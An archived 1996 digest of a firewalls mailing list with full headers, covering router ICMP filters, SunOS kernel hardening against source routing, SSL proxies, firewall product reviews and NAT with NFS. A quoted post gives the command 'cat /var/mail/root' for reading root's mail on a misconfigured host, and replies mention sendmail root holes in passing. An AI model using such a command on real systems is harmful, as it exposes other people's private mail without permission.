(8.7.1/Miles-951221-1) with SMTP id HAA06294 for ; Fri, 5 Jan 1996 07:26:04 -0800 (PST) Received: (from phil@localhost) by colt.milepost.com (8.6.12/8.6.9) id JAA08470 for firewalls@GreatCircle.COM; Fri, 5 Jan 1996 09:24:38 -0600 From: Phil Howard Message-Id: <199601051524.JAA08470@colt.milepost.com> Subject: Re: Re: Livingston Firewall IRX router -Reply To: firewalls@GreatCircle.COM Date: Fri, 5 Jan 1996 09:24:37 -0600 (CST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian Miller writes... > > The only problem I've had is that when I try to set up a filter for ICMP > > type 0 (ECHO REPLY if I read the RFC correctly) it refuses to accept > > that, so I just blocked all ICMP which can be a pain when we have a > > connectivity problem with our ISP. > > I noticed this problem too. It does not seem to accept zero as a 'port number', > so you cannot say "eq 0". However it accepts "lt 1" which should be equivalent, > which is what I am using. [Though I haven't actually been about to test the > filter yet.] Hmmm. They told me this would be fixed when I reported it over a year ago. -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! | phil@milepost.com +-------------------------------------------------+ From firewalls-owner Fri Jan 5 08:07:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA06866 for firewalls-outgoing; Fri, 5 Jan 1996 07:51:36 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA06847 for ; Fri, 5 Jan 1996 07:51:29 -0800 (PST) Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id KAA27683; Fri, 5 Jan 1996 10:50:51 -0500 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id KAA08493; Fri, 5 Jan 1996 10:49:26 -0500 Message-Id: <199601051549.KAA08493@calloway.bwh.harvard.edu> Subject: Re: Source Routed Packets To: CARSON@rmcs.cranfield.ac.uk (Neil) Date: Fri, 5 Jan 1996 10:49:25 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <960105133833.212c@rmcs.cranfield.ac.uk> from "Neil" at Jan 5, 96 01:38:33 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: | I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel | with IP packet forwarding turned off. | | The only problem is that SunOS will still (I believe) allow IP source | routed packets through the bastion host. | | Is there a software fix for this available that does not mean buying a | screening Cisco or something like that? It a simple kernel modification. In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your kernel.) options "IPFORWARDING=-1" There is a README in that directory that explains how to rebuild the kernel, if you're not used to doing it, or need a reminder. In a gerneric SUNOS kernel, I'd suggest turning off (or considering why you need) QUOTA: No users, no changes, no need to do quotas. NFSCLIENT, NFSSERVER: No File Security? Get rid of it. PCFS: Do you need that floppy for anything other than Tripwire? IPC(message, semaphore, shmem): Shared memory? Too complex. TCPdebug: Do you use trpt? Does anyrthing you plan to run on the firewall use it? RFS, VFSstats: Again, no sharing of disks. VDDRV (Loadable modules): Unless you have a device that demands them, loadmodule strikes me as more access to the kernel than you want. WINSVJ: Sunview? You're going to run it? The snit, pf, and nbuf pseudo-devices should probably go; your firewall is not a sniffer, or a network test device. I'd get rid of audio, too, unless you're using it for a PRNG seed. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Fri Jan 5 10:38:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA09941 for firewalls-outgoing; Fri, 5 Jan 1996 10:23:42 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA09936 for ; Fri, 5 Jan 1996 10:23:38 -0800 (PST) Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA19436; Fri, 5 Jan 1996 12:07:37 -0600 Date: Fri, 5 Jan 1996 12:07:37 -0600 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9601051807.AA19436@hosaka.smallworks.com> To: CARSON@rmcs.cranfield.ac.uk, adam@bwh.harvard.edu Subject: Re: Source Routed Packets Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >You wrote: > >It a simple kernel modification. > >In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your >kernel.) > >options "IPFORWARDING=-1" This won't prevent source routing. Jim From firewalls-owner Fri Jan 5 11:07:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10281 for firewalls-outgoing; Fri, 5 Jan 1996 10:41:04 -0800 (PST) Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10276 for ; Fri, 5 Jan 1996 10:40:33 -0800 (PST) Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id NAA00513; Fri, 5 Jan 1996 13:41:08 -0500 Date: Fri, 5 Jan 1996 13:41:08 -0500 Message-Id: <199601051841.NAA00513@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: mckenney@smiley.mitre.org (Brian W. McKenney) From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: SSL and S-HTTP Proxy support Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I would like to have an update as to which commercial firewall vendors >support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >a summary. > >This is the information that I have: > >1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. >2. KarlBridge/KarlBrouter: S-HTTP proxy >3. Milkyway Blackhole: S--HTTP >4. SOS Brimstone: S-HTTP proxy >5. Technologic Interceptor: S-HTTP proxy >6. V-One SmartWall: S-HTTP proxy > >License versions of TIS Gauntlet will support whatever the next Gauntlet >release supports. > > > -Brian > >Respectfully, > >Brian W. McKenney (mckenney@mitre.org) >Network Security Engineering >The MITRE Corporation Mail Stop: Z-231 >7525 Colshire Drive McLean, VA 22102 >Voice: 703-883-5463 Fax: 703-883-1245 SSL is not the type of protocol that requries a proxy. SSL is a Secure Sockets Layer API that can be used with any TCP port. For example, you can use SSL to secure a FTP, Telnet, WWW, or any other TCP protocol. Did TIS really tell you that they have a SSL proxy?? If so, what does it do? Am I missing something? Best regards, -Bill. --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Fri Jan 5 11:22:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10654 for firewalls-outgoing; Fri, 5 Jan 1996 10:55:26 -0800 (PST) Received: from tintagel.kesmai.com (tintagel-out.kesmai.com [199.95.72.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10639 for ; Fri, 5 Jan 1996 10:55:19 -0800 (PST) Received: by tintagel.kesmai.com; id NAA12279; Fri, 5 Jan 1996 13:52:23 -0500 Received: from muddy.kesmai.com(199.95.75.19) by tintagel.kesmai.com via smap (g3.0.1) id sma012276; Fri, 5 Jan 96 13:52:19 -0500 Received: from sandy_bryant (kespc222.kesmai.com [199.95.75.222]) by muddy.kesmai.com (8.6.12/8.6.9) with SMTP id NAA01907; Fri, 5 Jan 1996 13:53:17 -0500 Date: Fri, 5 Jan 1996 13:53:17 -0500 Message-Id: <199601051853.NAA01907@muddy.kesmai.com> X-Sender: slb@muddy.kesmai.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: SorG Farkas , firewalls@GreatCircle.COM From: sandy bryant Subject: Re: Gauntlet from TIS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 07:27 PM 1/4/96 -0800, SorG Farkas wrote: >If any of you has experience with Gauntlet, I would appreciate any info >about it (if it does what it promises, if it's reliable, any problems you >encountered, any do's and don'ts, experience with the support from them, >etc.). We are considering it for my company. Thanks a lot. > > We've run one here for about a year. I regard it as sort of one step up the price vs. effort ladder from installing the TIS toolkit yourself - although actually now TIS has ceased upgrading the free toolkit and the last upgrade of GAUNTLET was a significant upgrade which added truly transparent proxies. I have been happy with it - the proxies are reasonably easy to set up and flexible enough to keep the staff happy behind the firewall. TIS is still small enough that when I call with a problem, I get to talk to someone technical who probably even helped with the development. For the price, I think it's a good choice. sandy bryant kesmai corp. sandy@kesmai.com From firewalls-owner Fri Jan 5 11:40:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11294 for firewalls-outgoing; Fri, 5 Jan 1996 11:21:48 -0800 (PST) Received: from ns2.cpicorp.com (ns2.cpicorp.com [204.233.170.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11289 for ; Fri, 5 Jan 1996 11:21:44 -0800 (PST) Received: (from bkoen@localhost) by ns2.cpicorp.com (8.6.12/8.6.9) id TAA14429; Fri, 5 Jan 1996 19:54:16 -0600 Date: Fri, 5 Jan 1996 19:54:15 -0600 (CST) From: Bryan Koen To: firewalls@greatcircle.com Subject: BorderWare Product Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are looking possibly at using the Borderware product here at CPI Corp. I would like to know if anybody is currently using this package and what experiences (good/bad) they have had with it. Thanks, Bryan Koen SysAdmin CPI Corp. ========================================================================== These opinions are my own and do not reflect in any way on CPI Corporation. From firewalls-owner Fri Jan 5 11:52:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11460 for firewalls-outgoing; Fri, 5 Jan 1996 11:25:07 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11455 for ; Fri, 5 Jan 1996 11:25:03 -0800 (PST) Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id OAA00459; Fri, 5 Jan 1996 14:24:27 -0500 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id OAA09213; Fri, 5 Jan 1996 14:23:02 -0500 Message-Id: <199601051923.OAA09213@calloway.bwh.harvard.edu> Subject: Re: Source Routed Packets To: jim@SmallWorks.COM (Jim Thompson) Date: Fri, 5 Jan 1996 14:23:02 -0500 (EST) Cc: CARSON@rmcs.cranfield.ac.uk, adam@bwh.harvard.edu, firewalls@GreatCircle.COM In-Reply-To: <9601051807.AA19436@hosaka.smallworks.com> from "Jim Thompson" at Jan 5, 96 12:07:37 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jim wrote, responding to me: | >You wrote: | > | >It a simple kernel modification. | > | >In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your | >kernel.) | > | >options "IPFORWARDING=-1" | | This won't prevent source routing. D'oh! I should learn not to post before coffee. :) -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Fri Jan 5 12:10:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11221 for firewalls-outgoing; Fri, 5 Jan 1996 11:17:37 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11216 for ; Fri, 5 Jan 1996 11:17:33 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id LAA14767; Fri, 5 Jan 1996 11:15:07 -0800 Received: from unknown(134.127.16.1) by mycroft via smap (V1.3mjr) id sma014754; Fri Jan 5 11:14:33 1996 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id MAA25950; Fri, 5 Jan 1996 12:14:55 -0700 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id OAA11953; Fri, 5 Jan 1996 14:14:48 -0500 Date: Fri, 5 Jan 1996 14:14:47 -0500 (EST) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: Frank Willoughby cc: Neil , firewalls@GreatCircle.COM Subject: Re: Source Routed Packets In-Reply-To: <9601051437.AA07804@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well all he has to be specific about is the version of Sun OS that he is running. If it is SunOS4.1.X you need to patch the kernal to turn off source routing. (this patch is to the best of my knowledge not supported by SUN) it can be found in the archives of this mailing list. If it is Solaris 2.X I have been told you can turn off ip source routing using ndd. I have not verified the part about Solaris. Mike ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 On Fri, 5 Jan 1996, Frank Willoughby wrote: > Date: Fri, 5 Jan 96 09:37:15 -0500 > From: Frank Willoughby > To: Neil > Cc: firewalls@GreatCircle.COM > Subject: Re: Source Routed Packets > > Neil, > > > >I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel > >with IP packet forwarding turned off. > > > >The only problem is that SunOS will still (I believe) allow IP source > >routed packets through the bastion host. > > > > It is difficult to tell which firewall you are evaluating. Can you be > more specific? > > > >Is there a software fix for this available that does not mean buying a > >screening Cisco or something like that? > > > > Yours Aye, > > > > Neil > > > >* Neil A Carson > >* The Royal Military College of Science, Shrivenham > >* e-mail carson@rmcs.cranfield.ac.uk > >* Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home) > > Best Regards, > > > Frank > Fortified Networks Inc. - Management & Information Security Consulting > Phone: (317) 573-0800 - http://www.fortified.com/fortified/ > > > The opinions expressed above are of the author and may not > necessarily be representative of Fortified Networks Inc. > > From firewalls-owner Fri Jan 5 12:20:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10675 for firewalls-outgoing; Fri, 5 Jan 1996 10:56:06 -0800 (PST) Received: from SanFrancisco01.POP.InterNex.Net (SanFrancisco01.POP.InterNex.Net [205.158.3.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA10670 for ; Fri, 5 Jan 1996 10:56:00 -0800 (PST) Received: from Anthros.Com ([205.158.235.130]) by SanFrancisco01.POP.InterNex.Net (post.office MTA v1.9.1 ID# 0-11028) with SMTP id AAA10541 for ; Fri, 5 Jan 1996 10:54:41 -0700 Received: from phoebe.Anthros.Com by Anthros.Com (5.0/SMI-SVR4) id AA03549; Fri, 5 Jan 1996 10:53:57 -0800 Received: by phoebe.Anthros.Com (5.x/SMI-SVR4) id AA17178; Fri, 5 Jan 1996 10:51:11 -0800 Date: Fri, 5 Jan 1996 10:51:11 -0800 From: daemeonr@Anthros.Com@Anthros.Com Message-Id: <9601051851.AA17178@phoebe.Anthros.Com> To: firewalls@greatcircle.com Subject: Re: Holes in SunOS sendmail -Reading Root Mail X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The System administrator is incompetent (or more likely a sequence of underpaid wanna-be system administrators whose aggregate value equals one incompetent system admin). It is physically impossible to configure Sendmail to do what you saw, but easy for any root user (and they must be root or had the system hacked by someone who became root - i.e. the Sun security patches were not applied). Note that we have a thread here that assumes Suns are screwed up. The disadvantages of Suns are that (a) any fool can buy both a machine and a bootleg copy of the OS (b) both are cheap and (c) because of (b) they are common in colleges and university colleges. As a result, there are a bunch of wanna-be (i.e. cheap) admins out there who are screwing up Sun's - and Sun gets the bad rap! The OS security holes exist on every system from SCO, IBM or HP. The difference is that IBM, HP, and SGI customers are less likely to be of the low-life variety, hence more likely to run a professional organization with skilled admins. Note that vast majority of Sun shops are likewise profesionally run, but why do you think your low-price-leader Internet provider is using Sun`s? => From firewalls-owner@GreatCircle.COM Sat Dec 23 18:58 PST 1995 => Date: Sat, 23 Dec 1995 22:22:55 +0400 => X-Sender: gscpraba@emirates.net.ae => Mime-Version: 1.0 => To: Doug Hughes => From: gscpraba@ns2.emirates.net.ae (G.S.C.Prabhakar (The Sun)) => Subject: Re: Holes in SunOS sendmail -Reading Root Mail => Cc: firewalls@greatcircle.com => Sender: firewalls-owner@GreatCircle.COM => Content-Type: text/plain; charset="us-ascii" => => > => > => >> => >>Hello again all, => >> => >> SunOS sendmail. Apparently there are some holes in it that allow a => >>potential cracker to gain root privilidge on the host system, and install => >>password sniffers etc. => => >There are so many of such wide variety that it becomes tough to keep => >track of them all. => > => >among them: => >syslog buffer overflow gives root access => >executing local mailer in a certain way gives root access => >probably a race condition or two. => => => In one of the Internet Mail services I log in the ordinary user can just => read all the mail sent to the root. Is the Root Mail box is normally kept => like that other systems or it was a configuration negligence by the systems => people ? => => command to read that mail to root is => when this command is given by the normal user => => cat /var/mail/root => => Then You can read all the mail send to the root . => => Can somebody clarify ? => => GSC Prabhakar. => => => **************************************************************************** => ***** => " Wishing You a very Merry Christmas and Prosperous New Year 1996" => => G.S.C.Prabhakar (gscpraba@emirates.net.ae) => Internet Consultant & Trainer- => P.O.Box 72432 => Abu Dhabi. => United Arab Emirates. => => Pager : 91-555-304 => **************************************************************************** => ******* => From firewalls-owner Fri Jan 5 12:22:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA12988 for firewalls-outgoing; Fri, 5 Jan 1996 12:08:39 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA12958 for ; Fri, 5 Jan 1996 12:08:33 -0800 (PST) Message-Id: <199601052008.MAA12958@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA076902503; Sat, 6 Jan 1996 07:08:23 +1100 From: Darren Reed Subject: NAT & NFS ? To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Sat, 6 Jan 1996 07:08:23 +1100 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client and server, actively rewriting the addresses in all the packets involved ? If so, have any problems or unexpected situations arisen ? thanks, darren From firewalls-owner Fri Jan 5 13:48:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA13131 for firewalls-outgoing; Fri, 5 Jan 1996 12:13:12 -0800 (PST) Received: from bluenote.ccrwest.org (bluenote.ccrwest.org [192.203.205.129]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA13126 for ; Fri, 5 Jan 1996 12:13:03 -0800 (PST) Received: by bluenote.ccrwest.org (4.1/CCRWEST-I1.19) id AA15274; Fri, 5 Jan 96 12:10:44 PST Received: from ccrwest.ccrwest.org(192.203.205.65) by bluenote.ccrwest.org via smap (V1.3) id sma015272; Fri, 5 Jan 1996 12:10:17 -0800 Received: from poco.ccrwest.org by ccrwest.ccrwest.org (4.1/CCRWEST-2.9) id AA03139; Fri, 5 Jan 96 12:10:17 PST Received: by poco.ccrwest.org (4.1/ccrwest-1.6) id AA19043; Fri, 5 Jan 96 12:10:15 PST Date: Fri, 5 Jan 96 12:10:15 PST From: Rich Schultz Message-Id: <9601052010.AA19043@poco.ccrwest.org> To: CARSON@rmcs.cranfield.ac.uk, adam@bwh.harvard.edu, jim@SmallWorks.COM Subject: Re: Source Routed Packets Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >It is a simple kernel modification. > > > >In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your > >kernel.) > > > >options "IPFORWARDING=-1" > > This won't prevent source routing. Yes and no. If you set this option, the SunOS 4.1.3 kernel will NOT source route from one interface to another, but it will let you source route in and out the same interface. I have confirmed this by reading the code and by throwing source-routed packets at a host configured this way. This means, if you have one interface connected to the Internet and another connected to your private net, no one can source-route from one net to the other, but they can bounce packets off of your host to make mischief elsewhere. Rich Schultz rich@ccrwest.org From firewalls-owner Fri Jan 5 13:59:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA13050 for firewalls-outgoing; Fri, 5 Jan 1996 12:11:02 -0800 (PST) Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA13045 for ; Fri, 5 Jan 1996 12:10:58 -0800 (PST) Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id PAA00165; Fri, 5 Jan 1996 15:10:21 -0500 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA01779; Fri, 5 Jan 96 15:10:14 EST Date: Fri, 5 Jan 96 15:10:14 EST Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: wbunting@ch.inri.com (Bill Bunting) From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Re: SSL and S-HTTP Proxy support Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >SSL is not the type of protocol that requries a proxy. SSL is a Secure >Sockets Layer API that can be used with any TCP port. For example, you can >use SSL to secure a FTP, Telnet, WWW, or any other TCP protocol. Did TIS >really tell you that they have a SSL proxy?? If so, what does it do? Dual-homed gateway-based firewalls with IP forwarding disabled need to relay connections between an SSL-enhanced Web browser and server. Hence, an SSL proxy is needed to relay these connections. Capabilities among SSL proxies may differ. In most cases, SSL proxies may behave just like HTTP proxies in that they (a) can accept/reject connections based on IP addresses and (b) support the logging of connections. Additional functionality may be added to an SSL proxy (e.g., validation of signatures), but this may result in the addition of server code modules on the firewall. This practice conflicts with firewall goals to keep proxies simple and small. Note that firewall vendors will provide support for an SSL proxy. Netscape provides an SSL proxy today. From firewalls-owner Fri Jan 5 15:44:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06730 for firewalls-outgoing; Fri, 5 Jan 1996 15:37:43 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06725 for ; Fri, 5 Jan 1996 15:37:38 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA04458; Fri, 5 Jan 96 18:36:33 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA05401; Fri, 5 Jan 96 23:37:01 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9601052337.AA05401@london.csd.harris.com> Subject: Re: NAT & NFS ? To: firewalls-owner@GreatCircle.COM (Darren Reed) Date: Fri, 5 Jan 96 23:36:30 GMT In-Reply-To: <199601052008.MAA12958@miles.greatcircle.com>; from "Darren Reed" at Jan 6, 96 7:08 am X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This works fine on the Harris CyberGuard. TCP, UDP, RPC, ICMP all get suitably rewritten - even the ICMP error codes. The 'inside' system can initiate talk to the 'external' system, but the 'external' system has no knowledge of the 'internal' IP address - just the firewall. > > > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > and server, actively rewriting the addresses in all the packets involved ? > If so, have any problems or unexpected situations arisen ? > > thanks, > darren > Regards Jon From firewalls-owner Fri Jan 5 16:29:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07639 for firewalls-outgoing; Fri, 5 Jan 1996 16:14:08 -0800 (PST) Received: from eagle.wd.cubic.com ([149.63.94.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA07634 for ; Fri, 5 Jan 1996 16:14:04 -0800 (PST) Received: (mischler@localhost) by eagle.wd.cubic.com (8.6.9/8.3) id RAA19347; Fri, 5 Jan 1996 17:09:51 -0800 Date: Fri, 5 Jan 1996 17:09:51 -0800 From: Dave Mischler Message-Id: <199601060109.RAA19347@eagle.wd.cubic.com> To: avalon@coombs.anu.edu.au, Firewalls@GreatCircle.COM Subject: Re: NAT & NFS ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > and server, actively rewriting the addresses in all the packets involved ? > If so, have any problems or unexpected situations arisen ? I have used IPRoute's NAT to translate NFS client addresses from RFC 1597 addresses to global addresses. The only problems I had were related to the speed of the links (too slow). You can get IPRoute for evaluation from ftp://ftp.coast.net/SimTel/msdos/network/iprv080.zip From firewalls-owner Fri Jan 5 16:44:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA08197 for firewalls-outgoing; Fri, 5 Jan 1996 16:39:12 -0800 (PST) Received: from NYXGATE1.btco.com (gate1.btco.com [198.83.51.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA08188 for ; Fri, 5 Jan 1996 16:39:07 -0800 (PST) Received: (from mailer@localhost) by NYXGATE1.btco.com (8.7.1/8.6.9) id TAA22834 for ; Fri, 5 Jan 1996 19:38:13 -0500 (EST) X-Authentication-Warning: NYXGATE1.btco.com: mailer set sender to using -f Received: from lncsex0003.eu.btco.com(160.82.152.218) by NYXGATE1.btco.com via smap (V1.3) id sma026999; Fri Jan 5 19:37:58 1996 Received: (from news@localhost) by LNCSEX0003.eu.btco.com (8.7.1/BTmail) id AAA30371; Sat, 6 Jan 1996 00:37:59 GMT To: firewalls@greatcircle.com Path: newsadm From: Todd Aven Newsgroups: btco.list.firewalls Subject: Patches to BIND 4.9.3 available to support delegation in split-DNS configurations Date: Sat, 06 Jan 1996 00:32:11 +0000 Organization: Bankers Trust Company Lines: 48 Message-ID: <30EDC30B.4504@BankersTrust.Com> NNTP-Posting-Host: lnrasw0001.eu.btco.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 2.0b3 (WinNT; I) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have written small patches to BIND 4.9.3-REL which may prove useful to this audience. The problem that is solved arises when you configure a DNS server with a 'forwarders' directive to pass queries to the firewall but do not (or can not) make the server authoritative for all internal zones. This happens because the standard BIND code ignores zone delegation records when the server is configured with a list of forwarders. My solution (not endorsed by Paul Vixie who is going to be working on a much better and more elegant solution) is to add a new directive called 'noforward' which takes a list of domain names which should never be forwarded to the address(es) configured in the 'forwarders' directive. Consider a typical global organization, say 'nutsnbolts.com', which has a geographically-oriented DNS hierarchy: nutsnbolts.com Core facilities na.nutsnbolts.com North American hosts eu.nutsnbolts.com European hosts ap.nutsnbolts.com Asia/Pacific hosts sv.nutsnbolts.com Services Zone nutsnbolts.com has proper NS delegation records for na, eu, ap, and sv (all of which are served elsewhere within the organization). Server xyzzy is authoritative for zone nutsnbolts and has a 'forwarders' directive to pass queries to the firewall DNS server. With standard BIND, a DNS query directed to xyzzy for 'test.eu.nutsnbolts.com' will be sent to the firewall where it probably will be flatly rejected, since the data probably isn't out there in a typical split-DNS configuration. However, with my patches and a 'noforward nutsnbolts.com' directive, the query will be referred or recursed to the server authoritative for 'eu.nutsnbolts.com' and resolved (or not) the way one would expect. The patches are pretty small (152 lines in total) and pretty easy to inspect. For more complex situations, such as when xyzzy is not authoritative for the top level internal domain or in-addr.arpa domains, use of the experimental 'stub' directive (included in the standard BIND distribution) proves to be a very useful complement to 'noforward'. Anyone interested in obtaining the patches should email me directly, so as to keep volume on this list to a minimum. Regards, Todd.Aven@BankersTrust.Com From firewalls-owner Fri Jan 5 17:29:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA10255 for firewalls-outgoing; Fri, 5 Jan 1996 17:27:02 -0800 (PST) Received: from tide10.microsoft.com (tide10.microsoft.com [131.107.3.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA10241 for ; Fri, 5 Jan 1996 17:26:50 -0800 (PST) Received: by tide10.microsoft.com; id RAA24566; Fri, 5 Jan 1996 17:39:02 -0800 Received: from unknown(157.54.17.74) by tide10.microsoft.com via smap (g3.0.3) id xma024518; Fri, 5 Jan 96 17:38:46 -0800 Received: from 